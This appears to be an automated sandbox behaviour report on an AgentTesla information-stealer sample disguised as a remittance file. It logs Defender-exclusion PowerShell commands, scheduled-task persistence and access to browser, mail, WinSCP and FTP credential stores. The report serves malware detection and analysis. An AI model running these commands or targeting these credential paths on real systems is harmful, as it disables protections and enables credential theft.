                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeMemory written: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeMemory written: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess created: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.XNYbGrcoFr.exe.3b11250.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.XNYbGrcoFr.exe.3b4d470.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.XNYbGrcoFr.exe.3b4d470.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.XNYbGrcoFr.exe.3b11250.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4538569081.000000000308D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4534288426.0000000000437000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4538007808.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: GestorRemesasCONFIRMIMING.exe PID: 3892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GestorRemesasCONFIRMIMING.exe PID: 2760, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: XNYbGrcoFr.exe PID: 5096, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: XNYbGrcoFr.exe PID: 5308, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.XNYbGrcoFr.exe.3b11250.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.XNYbGrcoFr.exe.3b4d470.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.XNYbGrcoFr.exe.3b4d470.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.XNYbGrcoFr.exe.3b11250.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4534288426.0000000000437000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
